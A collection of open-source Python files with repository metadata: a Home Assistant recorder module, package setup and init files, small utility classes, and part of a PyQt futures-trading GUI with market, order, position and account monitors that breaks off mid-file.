"""Start processing events to save."""
tries = 1
connected = False
while not connected and tries <= self.db_max_retries:
if tries != 1:
time.sleep(self.db_retry_wait)
try:
self._setup_connection()
migration.migrate_schema(self)
self._setup_run()
connected = True
_LOGGER.debug("Connected to recorder database")
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
"Error during connection setup: %s (retrying in %s seconds)",
err,
self.db_retry_wait,
)
tries += 1
if not connected:
@callback
def connection_failed():
"""Connect failed tasks."""
self.async_db_ready.set_result(False)
persistent_notification.async_create(
self.hass,
"The recorder could not start, please check the log",
"Recorder",
)
self.hass.add_job(connection_failed)
return
shutdown_task = object()
hass_started = concurrent.futures.Future()
@callback
def register():
"""Post connection initialize."""
self.async_db_ready.set_result(True)
def shutdown(event):
"""Shut down the Recorder."""
if not hass_started.done():
hass_started.set_result(shutdown_task)
self.queue.put(None)
self.join()
self.hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, shutdown)
if self.hass.state == CoreState.running:
hass_started.set_result(None)
else:
@callback
def notify_hass_started(event):
"""Notify that hass has started."""
hass_started.set_result(None)
self.hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_START, notify_hass_started
)
self.hass.add_job(register)
result = hass_started.result()
# If shutdown happened before Home Assistant finished starting
if result is shutdown_task:
return
# Start periodic purge
if self.keep_days and self.purge_interval:
@callback
def async_purge(now):
"""Trigger the purge and schedule the next run."""
self.queue.put(PurgeTask(self.keep_days, repack=False))
self.hass.helpers.event.async_track_point_in_time(
async_purge, now + timedelta(days=self.purge_interval)
)
earliest = dt_util.utcnow() + timedelta(minutes=30)
run = latest = dt_util.utcnow() + timedelta(days=self.purge_interval)
with session_scope(session=self.get_session()) as session:
event = session.query(Events).first()
if event is not None:
session.expunge(event)
run = dt_util.as_utc(event.time_fired) + timedelta(
days=self.keep_days + self.purge_interval
)
run = min(latest, max(run, earliest))
self.hass.helpers.event.track_point_in_time(async_purge, run)
while True:
event = self.queue.get()
if event is None:
self._close_run()
self._close_connection()
self.queue.task_done()
return
if isinstance(event, PurgeTask):
purge.purge_old_data(self, event.keep_days, event.repack)
self.queue.task_done()
continue
if event.event_type == EVENT_TIME_CHANGED:
self.queue.task_done()
continue
if event.event_type in self.exclude_t:
self.queue.task_done()
continue
entity_id = event.data.get(ATTR_ENTITY_ID)
if entity_id is not None:
if not self.entity_filter(entity_id):
self.queue.task_done()
continue
tries = 1
updated = False
while not updated and tries <= self.db_max_retries:
if tries != 1:
time.sleep(self.db_retry_wait)
try:
with session_scope(session=self.get_session()) as session:
try:
dbevent = Events.from_event(event)
session.add(dbevent)
session.flush()
except (TypeError, ValueError):
_LOGGER.warning("Event is not JSON serializable: %s", event)
if event.event_type == EVENT_STATE_CHANGED:
try:
dbstate = States.from_event(event)
dbstate.event_id = dbevent.event_id
session.add(dbstate)
except (TypeError, ValueError):
_LOGGER.warning(
"State is not JSON serializable: %s",
event.data.get("new_state"),
)
updated = True
except exc.OperationalError as err:
_LOGGER.error(
"Error in database connectivity: %s. "
"(retrying in %s seconds)",
err,
self.db_retry_wait,
)
tries += 1
except exc.SQLAlchemyError:
updated = True
_LOGGER.exception("Error saving event: %s", event)
if not updated:
_LOGGER.error(
"Error in database update. Could not save "
"after %d tries. Giving up",
tries,
)
self.queue.task_done()
@callback
def event_listener(self, event):
"""Listen for new events and put them in the process queue."""
self.queue.put(event)
def block_till_done(self):
"""Block till all events processed."""
self.queue.join()
def _setup_connection(self):
"""Ensure database is ready to fly."""
kwargs = {}
# pylint: disable=unused-variable
@listens_for(Engine, "connect")
def set_sqlite_pragma(dbapi_connection, connection_record):
"""Set sqlite's WAL mode."""
if isinstance(dbapi_connection, Connection):
old_isolation = dbapi_connection.isolation_level
dbapi_connection.isolation_level = None
cursor = dbapi_connection.cursor()
cursor.execute("PRAGMA journal_mode=WAL")
cursor.close()
dbapi_connection.isolation_level = old_isolation
if self.db_url == "sqlite://" or ":memory:" in self.db_url:
kwargs["connect_args"] = {"check_same_thread": False}
kwargs["poolclass"] = StaticPool
kwargs["pool_reset_on_return"] = None
else:
kwargs["echo"] = False
if self.engine is not None:
self.engine.dispose()
self.engine = create_engine(self.db_url, **kwargs)
Base.metadata.create_all(self.engine)
self.get_session = scoped_session(sessionmaker(bind=self.engine))
def _close_connection(self):
"""Close the connection."""
self.engine.dispose()
self.engine = None
self.get_session = None
def _setup_run(self):
"""Log the start of the current run."""
with session_scope(session=self.get_session()) as session:
for run in session.query(RecorderRuns).filter_by(end=None):
run.closed_incorrect = True
run.end = self.recording_start
_LOGGER.warning(
"Ended unfinished session (id=%s from %s)", run.run_id, run.start
)
session.add(run)
self.run_info = RecorderRuns(
start=self.recording_start, created=dt_util.utcnow()
)
session.add(self.run_info)
session.flush()
session.expunge(self.run_info)
def _close_run(self):
"""Save end time for current run."""
with session_scope(session=self.get_session()) as session:
self.run_info.end = dt_util.utcnow()
session.add(self.run_info)
self.run_info = None
|
{
"content_hash": "50d5cf865537cee00b600a894254198a",
"timestamp": "",
"source": "github",
"line_count": 471,
"max_line_length": 88,
"avg_line_length": 33.62632696390658,
"alnum_prop": 0.5500063139285263,
"repo_name": "postlund/home-assistant",
"id": "af34d4dd9f631873e6c15e5647e40b8ba9cb8b8f",
"size": "15838",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/recorder/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20215859"
},
{
"name": "Shell",
"bytes": "6663"
}
],
"symlink_target": ""
}
|
"""Package for bundle management. "Bundle" refers to system-level
packages managed by specialized systems such as RedHat's RPM, Debian
and Ubuntu's APT, OSX's fink, etc."""
from vistrails.core.bundles.pyimport import py_import
from vistrails.core.bundles.installbundle import install
|
{
"content_hash": "d66edf79e653c8677e09d326444809a3",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 68,
"avg_line_length": 56.8,
"alnum_prop": 0.8028169014084507,
"repo_name": "Nikea/VisTrails",
"id": "14a819bdaed102f49ce1b8c691de1db7a575f53e",
"size": "2165",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vistrails/core/bundles/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1421"
},
{
"name": "Inno Setup",
"bytes": "19611"
},
{
"name": "Makefile",
"bytes": "768"
},
{
"name": "Mako",
"bytes": "66415"
},
{
"name": "PHP",
"bytes": "49038"
},
{
"name": "Python",
"bytes": "19674395"
},
{
"name": "R",
"bytes": "778864"
},
{
"name": "Rebol",
"bytes": "3972"
},
{
"name": "Shell",
"bytes": "34182"
},
{
"name": "TeX",
"bytes": "145219"
},
{
"name": "XSLT",
"bytes": "1090"
}
],
"symlink_target": ""
}
|
import os
from setuptools import setup
required = [
'requests',
]
packages = [
'pymercadopago',
]
description = "A library to interact with the MercadoPago gateway payment"
setup(
name="pymercadopago",
version="0.0.5",
author="Angel Velasquez, Diego Ramirez",
author_email="angel.velasquez@elo7.com, diego.ramirez@elo7.com",
description=description,
license="MIT",
keywords="mercadopago pymercadopago",
url="https://bitbucket.org/angvp/pymercadopago",
packages=packages,
package_data={'pymercadopago':
[
'pymercadopago/*',
'LICENSE.txt',
'README',
'CHANGES.txt',
]
},
include_package_data=True,
platforms=['Platform Independent'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
],
install_requires=required,
)
|
{
"content_hash": "6fcf74cfa47d1a7754ad4460ecf4cea2",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 74,
"avg_line_length": 25.866666666666667,
"alnum_prop": 0.6116838487972509,
"repo_name": "angvp/pymercadopago",
"id": "5417d16238d3e9e783c32f7837ac0d37448a985d",
"size": "1164",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14098"
}
],
"symlink_target": ""
}
|
import data_io
class tree(object):
def __init__(self, phrase, words):
self.phrase = phrase
self.embeddings = []
self.representation = None
def populate_embeddings(self, words):
phrase = self.phrase.lower()
arr = phrase.split()
for i in arr:
self.embeddings.append(data_io.lookupIDX(words,i))
def unpopulate_embeddings(self):
self.embeddings = []
|
{
"content_hash": "ebb7c8286bed56d83bd76e5cc61a3911",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 62,
"avg_line_length": 25.235294117647058,
"alnum_prop": 0.5990675990675991,
"repo_name": "YingyuLiang/SIF_mini_demo",
"id": "aed64326d3e1b36ac1c5b221a4fdc09fadff58e3",
"size": "429",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/tree.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14101"
}
],
"symlink_target": ""
}
|
import os
import re
def mkdir(*args):
try:
return os.mkdir(*args)
except:
return
def ls(path='.'):
return os.listdir(path)
def cd(path):
return os.chdir(path)
def touch(path):
return os.system('touch ' + path)
def pwd():
return os.curdir
def cat():
return
def echo():
return
def head():
return
def tail():
return
def grep():
return
|
{
"content_hash": "0dec699c8aac8249ee86b579437715fa",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 37,
"avg_line_length": 11.222222222222221,
"alnum_prop": 0.5767326732673267,
"repo_name": "geekan/psu",
"id": "9c9e10f777a9e7f71c9b80443f1cba9b16acc389",
"size": "404",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "psu/psu.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "781"
}
],
"symlink_target": ""
}
|
import json
import csv
from collections import OrderedDict
from PyQt4 import QtGui, QtCore
from eventEngine import *
from vtFunction import *
from vtGateway import *
#----------------------------------------------------------------------
def loadFont():
"""载入字体设置"""
try:
f = file("VT_setting.json")
setting = json.load(f)
family = setting['fontFamily']
size = setting['fontSize']
font = QtGui.QFont(family, size)
except:
font = QtGui.QFont(u'微软雅黑', 12)
return font
BASIC_FONT = loadFont()
########################################################################
class BasicCell(QtGui.QTableWidgetItem):
"""基础的单元格"""
#----------------------------------------------------------------------
def __init__(self, text=None, mainEngine=None):
"""Constructor"""
super(BasicCell, self).__init__()
self.data = None
if text:
self.setContent(text)
#----------------------------------------------------------------------
def setContent(self, text):
"""设置内容"""
if text == '0' or text == '0.0':
self.setText('')
else:
self.setText(text)
########################################################################
class DirectionCell(QtGui.QTableWidgetItem):
"""用来显示买卖方向的单元格"""
#----------------------------------------------------------------------
def __init__(self, text=None, mainEngine=None):
"""Constructor"""
super(DirectionCell, self).__init__()
self.data = None
if text:
self.setContent(text)
#----------------------------------------------------------------------
def setContent(self, text):
"""设置内容"""
if text == DIRECTION_LONG or text == DIRECTION_NET:
self.setForeground(QtGui.QColor('red'))
elif text == DIRECTION_SHORT:
self.setForeground(QtGui.QColor('green'))
self.setText(text)
########################################################################
class NameCell(QtGui.QTableWidgetItem):
"""用来显示合约中文的单元格"""
#----------------------------------------------------------------------
def __init__(self, text=None, mainEngine=None):
"""Constructor"""
super(NameCell, self).__init__()
self.mainEngine = mainEngine
self.data = None
if text:
self.setContent(text)
#----------------------------------------------------------------------
def setContent(self, text):
"""设置内容"""
if self.mainEngine:
# 首先尝试正常获取合约对象
contract = self.mainEngine.getContract(text)
# 如果能读取合约信息
if contract:
self.setText(contract.name)
########################################################################
class BidCell(QtGui.QTableWidgetItem):
"""买价单元格"""
#----------------------------------------------------------------------
def __init__(self, text=None, mainEngine=None):
"""Constructor"""
super(BidCell, self).__init__()
self.data = None
self.setForeground(QtGui.QColor('black'))
self.setBackground(QtGui.QColor(255,174,201))
if text:
self.setContent(text)
#----------------------------------------------------------------------
def setContent(self, text):
"""设置内容"""
self.setText(text)
########################################################################
class AskCell(QtGui.QTableWidgetItem):
"""买价单元格"""
#----------------------------------------------------------------------
def __init__(self, text=None, mainEngine=None):
"""Constructor"""
super(AskCell, self).__init__()
self.data = None
self.setForeground(QtGui.QColor('black'))
self.setBackground(QtGui.QColor(160,255,160))
if text:
self.setContent(text)
#----------------------------------------------------------------------
def setContent(self, text):
"""设置内容"""
self.setText(text)
########################################################################
class BasicMonitor(QtGui.QTableWidget):
"""
基础监控
headerDict中的值对应的字典格式如下
{'chinese': u'中文名', 'cellType': BasicCell}
"""
signal = QtCore.pyqtSignal(type(Event()))
#----------------------------------------------------------------------
def __init__(self, mainEngine=None, eventEngine=None, parent=None):
"""Constructor"""
super(BasicMonitor, self).__init__(parent)
self.mainEngine = mainEngine
self.eventEngine = eventEngine
# 保存表头标签用
self.headerDict = OrderedDict() # 有序字典,key是英文名,value是对应的配置字典
self.headerList = [] # 对应self.headerDict.keys()
# 保存相关数据用
self.dataDict = {} # 字典,key是字段对应的数据,value是保存相关单元格的字典
self.dataKey = '' # 字典键对应的数据字段
# 监控的事件类型
self.eventType = ''
# 字体
self.font = None
# 保存数据对象到单元格
self.saveData = False
# 默认不允许根据表头进行排序,需要的组件可以开启
self.sorting = False
# 初始化右键菜单
self.initMenu()
#----------------------------------------------------------------------
def setHeaderDict(self, headerDict):
"""设置表头有序字典"""
self.headerDict = headerDict
self.headerList = headerDict.keys()
#----------------------------------------------------------------------
def setDataKey(self, dataKey):
"""设置数据字典的键"""
self.dataKey = dataKey
#----------------------------------------------------------------------
def setEventType(self, eventType):
"""设置监控的事件类型"""
self.eventType = eventType
#----------------------------------------------------------------------
def setFont(self, font):
"""设置字体"""
self.font = font
#----------------------------------------------------------------------
def setSaveData(self, saveData):
"""设置是否要保存数据到单元格"""
self.saveData = saveData
#----------------------------------------------------------------------
def initTable(self):
"""初始化表格"""
# 设置表格的列数
col = len(self.headerDict)
self.setColumnCount(col)
# 设置列表头
labels = [d['chinese'] for d in self.headerDict.values()]
self.setHorizontalHeaderLabels(labels)
# 关闭左边的垂直表头
self.verticalHeader().setVisible(False)
# 设为不可编辑
self.setEditTriggers(self.NoEditTriggers)
# 设为行交替颜色
self.setAlternatingRowColors(True)
# 设置允许排序
self.setSortingEnabled(self.sorting)
#----------------------------------------------------------------------
def registerEvent(self):
"""注册GUI更新相关的事件监听"""
self.signal.connect(self.updateEvent)
self.eventEngine.register(self.eventType, self.signal.emit)
#----------------------------------------------------------------------
def updateEvent(self, event):
"""收到事件更新"""
data = event.dict_['data']
self.updateData(data)
#----------------------------------------------------------------------
def updateData(self, data):
"""将数据更新到表格中"""
# 如果允许了排序功能,则插入数据前必须关闭,否则插入新的数据会变乱
if self.sorting:
self.setSortingEnabled(False)
# 如果设置了dataKey,则采用存量更新模式
if self.dataKey:
key = data.__getattribute__(self.dataKey)
# 如果键在数据字典中不存在,则先插入新的一行,并创建对应单元格
if key not in self.dataDict:
self.insertRow(0)
d = {}
for n, header in enumerate(self.headerList):
content = safeUnicode(data.__getattribute__(header))
cellType = self.headerDict[header]['cellType']
cell = cellType(content, self.mainEngine)
if self.font:
cell.setFont(self.font) # 如果设置了特殊字体,则进行单元格设置
if self.saveData: # 如果设置了保存数据对象,则进行对象保存
cell.data = data
self.setItem(0, n, cell)
d[header] = cell
self.dataDict[key] = d
# 否则如果已经存在,则直接更新相关单元格
else:
d = self.dataDict[key]
for header in self.headerList:
content = safeUnicode(data.__getattribute__(header))
cell = d[header]
cell.setContent(content)
if self.saveData: # 如果设置了保存数据对象,则进行对象保存
cell.data = data
# 否则采用增量更新模式
else:
self.insertRow(0)
for n, header in enumerate(self.headerList):
content = safeUnicode(data.__getattribute__(header))
cellType = self.headerDict[header]['cellType']
cell = cellType(content, self.mainEngine)
if self.font:
cell.setFont(self.font)
if self.saveData:
cell.data = data
self.setItem(0, n, cell)
# 调整列宽
self.resizeColumns()
# 重新打开排序
if self.sorting:
self.setSortingEnabled(True)
#----------------------------------------------------------------------
def resizeColumns(self):
"""调整各列的大小"""
self.horizontalHeader().resizeSections(QtGui.QHeaderView.ResizeToContents)
#----------------------------------------------------------------------
def setSorting(self, sorting):
"""设置是否允许根据表头排序"""
self.sorting = sorting
#----------------------------------------------------------------------
def saveToCsv(self):
"""保存表格内容到CSV文件"""
# 先隐藏右键菜单
self.menu.close()
# 获取想要保存的文件名
path = QtGui.QFileDialog.getSaveFileName(self, '保存数据', '', 'CSV(*.csv)')
try:
if not path.isEmpty():
with open(unicode(path), 'wb') as f:
writer = csv.writer(f)
# 保存标签
headers = [header.encode('gbk') for header in self.headerList]
writer.writerow(headers)
# 保存每行内容
for row in range(self.rowCount()):
rowdata = []
for column in range(self.columnCount()):
item = self.item(row, column)
if item is not None:
rowdata.append(
unicode(item.text()).encode('gbk'))
else:
rowdata.append('')
writer.writerow(rowdata)
except IOError:
pass
#----------------------------------------------------------------------
def initMenu(self):
"""初始化右键菜单"""
self.menu = QtGui.QMenu(self)
saveAction = QtGui.QAction(u'保存内容', self)
saveAction.triggered.connect(self.saveToCsv)
self.menu.addAction(saveAction)
#----------------------------------------------------------------------
def contextMenuEvent(self, event):
"""右键点击事件"""
self.menu.popup(QtGui.QCursor.pos())
########################################################################
class MarketMonitor(BasicMonitor):
"""市场监控组件"""
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine, parent=None):
"""Constructor"""
super(MarketMonitor, self).__init__(mainEngine, eventEngine, parent)
# 设置表头有序字典
d = OrderedDict()
d['symbol'] = {'chinese':u'合约代码', 'cellType':BasicCell}
d['vtSymbol'] = {'chinese':u'名称', 'cellType':NameCell}
d['lastPrice'] = {'chinese':u'最新价', 'cellType':BasicCell}
d['preClosePrice'] = {'chinese':u'昨收盘价', 'cellType':BasicCell}
d['volume'] = {'chinese':u'成交量', 'cellType':BasicCell}
d['openInterest'] = {'chinese':u'持仓量', 'cellType':BasicCell}
d['openPrice'] = {'chinese':u'开盘价', 'cellType':BasicCell}
d['highPrice'] = {'chinese':u'最高价', 'cellType':BasicCell}
d['lowPrice'] = {'chinese':u'最低价', 'cellType':BasicCell}
d['bidPrice1'] = {'chinese':u'买一价', 'cellType':BidCell}
d['bidVolume1'] = {'chinese':u'买一量', 'cellType':BidCell}
d['askPrice1'] = {'chinese':u'卖一价', 'cellType':AskCell}
d['askVolume1'] = {'chinese':u'卖一量', 'cellType':AskCell}
d['time'] = {'chinese':u'时间', 'cellType':BasicCell}
d['gatewayName'] = {'chinese':u'接口', 'cellType':BasicCell}
self.setHeaderDict(d)
# 设置数据键
self.setDataKey('vtSymbol')
# 设置监控事件类型
self.setEventType(EVENT_TICK)
# 设置字体
self.setFont(BASIC_FONT)
# 设置允许排序
self.setSorting(True)
# 初始化表格
self.initTable()
# 注册事件监听
self.registerEvent()
########################################################################
class LogMonitor(BasicMonitor):
"""日志监控"""
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine, parent=None):
"""Constructor"""
super(LogMonitor, self).__init__(mainEngine, eventEngine, parent)
d = OrderedDict()
d['logTime'] = {'chinese':u'时间', 'cellType':BasicCell}
d['logContent'] = {'chinese':u'内容', 'cellType':BasicCell}
d['gatewayName'] = {'chinese':u'接口', 'cellType':BasicCell}
self.setHeaderDict(d)
self.setEventType(EVENT_LOG)
self.setFont(BASIC_FONT)
self.initTable()
self.registerEvent()
########################################################################
class ErrorMonitor(BasicMonitor):
"""错误监控"""
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine, parent=None):
"""Constructor"""
super(ErrorMonitor, self).__init__(mainEngine, eventEngine, parent)
d = OrderedDict()
d['errorTime'] = {'chinese':u'错误时间', 'cellType':BasicCell}
d['errorID'] = {'chinese':u'错误代码', 'cellType':BasicCell}
d['errorMsg'] = {'chinese':u'错误信息', 'cellType':BasicCell}
d['additionalInfo'] = {'chinese':u'补充信息', 'cellType':BasicCell}
d['gatewayName'] = {'chinese':u'接口', 'cellType':BasicCell}
self.setHeaderDict(d)
self.setEventType(EVENT_ERROR)
self.setFont(BASIC_FONT)
self.initTable()
self.registerEvent()
########################################################################
class TradeMonitor(BasicMonitor):
"""成交监控"""
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine, parent=None):
"""Constructor"""
super(TradeMonitor, self).__init__(mainEngine, eventEngine, parent)
d = OrderedDict()
d['tradeID'] = {'chinese':u'成交编号', 'cellType':BasicCell}
d['orderID'] = {'chinese':u'委托编号', 'cellType':BasicCell}
d['symbol'] = {'chinese':u'合约代码', 'cellType':BasicCell}
d['vtSymbol'] = {'chinese':u'名称', 'cellType':NameCell}
d['direction'] = {'chinese':u'方向', 'cellType':DirectionCell}
d['offset'] = {'chinese':u'开平', 'cellType':BasicCell}
d['price'] = {'chinese':u'价格', 'cellType':BasicCell}
d['volume'] = {'chinese':u'数量', 'cellType':BasicCell}
d['tradeTime'] = {'chinese':u'成交时间', 'cellType':BasicCell}
d['gatewayName'] = {'chinese':u'接口', 'cellType':BasicCell}
self.setHeaderDict(d)
self.setEventType(EVENT_TRADE)
self.setFont(BASIC_FONT)
self.initTable()
self.registerEvent()
########################################################################
class OrderMonitor(BasicMonitor):
"""委托监控"""
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine, parent=None):
"""Constructor"""
super(OrderMonitor, self).__init__(mainEngine, eventEngine, parent)
self.mainEngine = mainEngine
d = OrderedDict()
d['orderID'] = {'chinese':u'委托编号', 'cellType':BasicCell}
d['symbol'] = {'chinese':u'合约代码', 'cellType':BasicCell}
d['vtSymbol'] = {'chinese':u'名称', 'cellType':NameCell}
d['direction'] = {'chinese':u'方向', 'cellType':DirectionCell}
d['offset'] = {'chinese':u'开平', 'cellType':BasicCell}
d['price'] = {'chinese':u'价格', 'cellType':BasicCell}
d['totalVolume'] = {'chinese':u'委托数量', 'cellType':BasicCell}
d['tradedVolume'] = {'chinese':u'成交数量', 'cellType':BasicCell}
d['status'] = {'chinese':u'状态', 'cellType':BasicCell}
d['orderTime'] = {'chinese':u'委托时间', 'cellType':BasicCell}
d['cancelTime'] = {'chinese':u'撤销时间', 'cellType':BasicCell}
d['frontID'] = {'chinese':u'前置编号', 'cellType':BasicCell}
d['sessionID'] = {'chinese':u'会话编号', 'cellType':BasicCell}
d['gatewayName'] = {'chinese':u'接口', 'cellType':BasicCell}
self.setHeaderDict(d)
self.setDataKey('vtOrderID')
self.setEventType(EVENT_ORDER)
self.setFont(BASIC_FONT)
self.setSaveData(True)
self.initTable()
self.registerEvent()
self.connectSignal()
#----------------------------------------------------------------------
def connectSignal(self):
"""连接信号"""
# 双击单元格撤单
self.itemDoubleClicked.connect(self.cancelOrder)
#----------------------------------------------------------------------
def cancelOrder(self, cell):
"""根据单元格的数据撤单"""
order = cell.data
req = VtCancelOrderReq()
req.symbol = order.symbol
req.exchange = order.exchange
req.frontID = order.frontID
req.sessionID = order.sessionID
req.orderID = order.orderID
self.mainEngine.cancelOrder(req, order.gatewayName)
########################################################################
class PositionMonitor(BasicMonitor):
"""持仓监控"""
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine, parent=None):
"""Constructor"""
super(PositionMonitor, self).__init__(mainEngine, eventEngine, parent)
d = OrderedDict()
d['symbol'] = {'chinese':u'合约代码', 'cellType':BasicCell}
d['vtSymbol'] = {'chinese':u'名称', 'cellType':NameCell}
d['direction'] = {'chinese':u'方向', 'cellType':DirectionCell}
d['position'] = {'chinese':u'持仓量', 'cellType':BasicCell}
d['ydPosition'] = {'chinese':u'昨持仓', 'cellType':BasicCell}
d['frozen'] = {'chinese':u'冻结量', 'cellType':BasicCell}
d['price'] = {'chinese':u'价格', 'cellType':BasicCell}
d['gatewayName'] = {'chinese':u'接口', 'cellType':BasicCell}
self.setHeaderDict(d)
self.setDataKey('vtPositionName')
self.setEventType(EVENT_POSITION)
self.setFont(BASIC_FONT)
self.setSaveData(True)
self.initTable()
self.registerEvent()
########################################################################
class AccountMonitor(BasicMonitor):
"""账户监控"""
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine, parent=None):
"""Constructor"""
super(AccountMonitor, self).__init__(mainEngine, eventEngine, parent)
d = OrderedDict()
d['accountID'] = {'chinese':u'账户', 'cellType':BasicCell}
d['preBalance'] = {'chinese':u'昨结', 'cellType':BasicCell}
d['balance'] = {'chinese':u'净值', 'cellType':BasicCell}
d['available'] = {'chinese':u'可用', 'cellType':BasicCell}
d['commission'] = {'chinese':u'手续费', 'cellType':BasicCell}
d['margin'] = {'chinese':u'保证金', 'cellType':BasicCell}
d['closeProfit'] = {'chinese':u'平仓盈亏', 'cellType':BasicCell}
d['positionProfit'] = {'chinese':u'持仓盈亏', 'cellType':BasicCell}
d['gatewayName'] = {'chinese':u'接口', 'cellType':BasicCell}
self.setHeaderDict(d)
self.setDataKey('vtAccountID')
self.setEventType(EVENT_ACCOUNT)
self.setFont(BASIC_FONT)
self.initTable()
self.registerEvent()
########################################################################
class TradingWidget(QtGui.QFrame):
"""简单交易组件"""
signal = QtCore.pyqtSignal(type(Event()))
directionList = [DIRECTION_LONG,
DIRECTION_SHORT]
offsetList = [OFFSET_OPEN,
OFFSET_CLOSE,
OFFSET_CLOSEYESTERDAY,
OFFSET_CLOSETODAY]
priceTypeList = [PRICETYPE_LIMITPRICE,
PRICETYPE_MARKETPRICE,
PRICETYPE_FAK,
PRICETYPE_FOK]
exchangeList = [EXCHANGE_NONE,
EXCHANGE_CFFEX,
EXCHANGE_SHFE,
EXCHANGE_DCE,
EXCHANGE_CZCE,
EXCHANGE_SSE,
EXCHANGE_SZSE,
EXCHANGE_SGE,
EXCHANGE_HKEX,
EXCHANGE_SMART,
EXCHANGE_NYMEX,
EXCHANGE_GLOBEX,
EXCHANGE_IDEALPRO]
currencyList = [CURRENCY_NONE,
CURRENCY_CNY,
CURRENCY_USD]
productClassList = [PRODUCT_NONE,
PRODUCT_EQUITY,
PRODUCT_FUTURES,
PRODUCT_OPTION,
PRODUCT_FOREX]
gatewayList = ['']
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine, parent=None):
"""Constructor"""
super(TradingWidget, self).__init__(parent)
self.mainEngine = mainEngine
self.eventEngine = eventEngine
self.symbol = ''
# 添加交易接口
self.gatewayList.extend(mainEngine.gatewayDict.keys())
self.initUi()
self.connectSignal()
#----------------------------------------------------------------------
def initUi(self):
"""初始化界面"""
self.setWindowTitle(u'交易')
self.setMaximumWidth(400)
self.setFrameShape(self.Box) # 设置边框
self.setLineWidth(1)
# 左边部分
labelSymbol = QtGui.QLabel(u'代码')
labelName = QtGui.QLabel(u'名称')
labelDirection = QtGui.QLabel(u'方向类型')
labelOffset = QtGui.QLabel(u'开平')
labelPrice = QtGui.QLabel(u'价格')
self.checkFixed = QtGui.QCheckBox(u'固定') # 价格固定选择框
labelVolume = QtGui.QLabel(u'数量')
# self.checkVolumeFixed = QtGui.QCheckBox(u'锁定') # 锁定Volume为0
labelPriceType = QtGui.QLabel(u'价格类型')
labelExchange = QtGui.QLabel(u'交易所')
labelCurrency = QtGui.QLabel(u'货币')
labelProductClass = QtGui.QLabel(u'产品类型')
labelGateway = QtGui.QLabel(u'交易接口')
self.lineSymbol = QtGui.QLineEdit()
self.lineName = QtGui.QLineEdit()
self.comboDirection = QtGui.QComboBox()
self.comboDirection.addItems(self.directionList)
self.comboOffset = QtGui.QComboBox()
self.comboOffset.addItems(self.offsetList)
self.spinPrice = QtGui.QDoubleSpinBox()
self.spinPrice.setDecimals(4)
self.spinPrice.setMinimum(0)
self.spinPrice.setMaximum(100000)
self.spinVolume = QtGui.QSpinBox()
self.spinVolume.setMinimum(0)
self.spinVolume.setMaximum(1000000)
self.comboPriceType = QtGui.QComboBox()
self.comboPriceType.addItems(self.priceTypeList)
self.comboExchange = QtGui.QComboBox()
self.comboExchange.addItems(self.exchangeList)
self.comboCurrency = QtGui.QComboBox()
self.comboCurrency.addItems(self.currencyList)
self.comboProductClass = QtGui.QComboBox()
self.comboProductClass.addItems(self.productClassList)
self.comboGateway = QtGui.QComboBox()
self.comboGateway.addItems(self.gatewayList)
gridleft = QtGui.QGridLayout()
gridleft.addWidget(labelSymbol, 0, 0)
gridleft.addWidget(labelName, 1, 0)
gridleft.addWidget(labelDirection, 2, 0)
gridleft.addWidget(labelOffset, 3, 0)
gridleft.addWidget(labelPrice, 4, 0)
gridleft.addWidget(labelVolume, 5, 0)
gridleft.addWidget(labelPriceType, 6, 0)
gridleft.addWidget(labelExchange, 7, 0)
gridleft.addWidget(labelCurrency, 8, 0)
gridleft.addWidget(labelProductClass, 9, 0)
gridleft.addWidget(labelGateway, 10, 0)
gridleft.addWidget(self.lineSymbol, 0, 1, 1, -1)
gridleft.addWidget(self.lineName, 1, 1, 1, -1)
gridleft.addWidget(self.comboDirection, 2, 1, 1, -1)
gridleft.addWidget(self.comboOffset, 3, 1, 1, -1)
gridleft.addWidget(self.spinPrice, 4, 1)
gridleft.addWidget(self.checkFixed, 4, 2)
gridleft.addWidget(self.spinVolume, 5, 1, 1, -1)
# gridleft.addWidget(self.checkVolumeFixed, 5, 2)
gridleft.addWidget(self.comboPriceType, 6, 1, 1, -1)
gridleft.addWidget(self.comboExchange, 7, 1, 1, -1)
gridleft.addWidget(self.comboCurrency, 8, 1, 1, -1)
gridleft.addWidget(self.comboProductClass, 9, 1, 1, -1)
gridleft.addWidget(self.comboGateway, 10, 1, 1, -1)
# 右边部分
labelBid1 = QtGui.QLabel(u'买一')
labelBid2 = QtGui.QLabel(u'买二')
labelBid3 = QtGui.QLabel(u'买三')
labelBid4 = QtGui.QLabel(u'买四')
labelBid5 = QtGui.QLabel(u'买五')
labelAsk1 = QtGui.QLabel(u'卖一')
labelAsk2 = QtGui.QLabel(u'卖二')
labelAsk3 = QtGui.QLabel(u'卖三')
labelAsk4 = QtGui.QLabel(u'卖四')
